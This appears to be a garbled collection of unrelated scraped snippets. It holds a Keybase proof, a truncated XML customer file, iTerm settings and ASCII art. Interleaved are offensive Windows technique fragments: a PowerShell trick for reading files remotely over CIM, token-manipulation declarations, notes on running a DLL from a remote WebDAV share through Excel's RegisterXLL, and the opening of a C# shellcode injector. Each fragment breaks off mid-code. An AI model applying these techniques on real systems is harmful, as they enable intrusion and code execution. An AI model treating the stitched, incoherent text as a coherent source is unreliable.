I hereby claim:
- I am rkornmeyer on github.
- I am r0bchain (https://keybase.io/r0bchain) on keybase.
- I have a public key ASCymwg5NS5KC-s99SG-umzYpHKY5lE_WCCZ72XQFv3W0go
To claim this, I am signing this object:
<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="script.xsl" ?>
<customers>
<customer>
<name>John Smith</name>
<address>123 Elm St.</address>
<phone>(123) 456-7890</phone>
</customer>
<customer>
<name>Mary Jones</name>
$CimSession = New-CimSession -ComputerName 10.0.0.2
$FilePath = 'C:\Windows\System32\notepad.exe'
# PS_ModuleFile only implements GetInstance (versus EnumerateInstance), so the trick below forces a "Get" operation instead of the default "Enumerate" operation.
$PSModuleFileClass = Get-CimClass -Namespace ROOT/Microsoft/Windows/Powershellv3 -ClassName PS_ModuleFile -CimSession $CimSession
$InMemoryModuleFileInstance = New-CimInstance -CimClass $PSModuleFileClass -Property @{ InstanceID = $FilePath } -ClientOnly
$FileContents = Get-CimInstance -InputObject $InMemoryModuleFileInstance -CimSession $CimSession
$FileLengthBytes = $FileContents.FileData[0..3]
[Array]::Reverse($FileLengthBytes)
DWORD Error, bytesIO;
NTSTATUS Status;
HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
BOOL bCond = FALSE;
SHELLEXECUTEINFO shinfo;
SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
TOKEN_MANDATORY_LABEL tml, *ptml;
PSID pIntegritySid = NULL;
STARTUPINFO si;
PROCESS_INFORMATION pi;
requirements:
"                _                                _                "
"               _ /||    .                .    ||\ _               "
"              ( } \||D  '   '   '   '   C||/ { %              "
"              | /\__,=_[_]  '  .  .  '  [_]_=,__/\ |             "
"              |_\_  |----|                |----|  _/_|            "
"              |  |/  |  |                  |  |  \|  |            "
"              |  /_  |  |                  |  |  _\  |            "
It is all fun and games until someone gets hacked!
Go to Preferences->Profiles tab. Select your profile on the left, and then open the Keyboard tab. At the bottom is a set of buttons that lets you select the behavior of the Option key. For most users, Esc+ will be the best choice.
A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.
When delivering via WebDAV, note that the DLL is still written to disk, but the dropped file is not the one loaded into the process. This is the case for any file downloaded via WebDAV; such files are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.
The RegisterXLL function expects an XLL add-in, which is essentially a specially crafted DLL with specific exports. More info on XLLs can be found on MSDN.
The XLL can also be executed by double-clicking the .xll file; however, this triggers a security warning. @rxwx has more notes on this here inc
#include "stdafx.h"
int main()
{
ICLRMetaHost *metaHost = NULL;
IEnumUnknown *runtime = NULL;
ICLRRuntimeInfo *runtimeInfo = NULL;
ICLRRuntimeHost *runtimeHost = NULL;
IUnknown *enumRuntime = NULL;
LPWSTR frameworkName = NULL;
/* Author: TheWover
Description: Injects embedded base64-encoded shellcode into an arbitrary hardcoded process using native Windows 32 API calls.
Last Modified: 11/1/2018
*/
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
namespace ShellcodeTest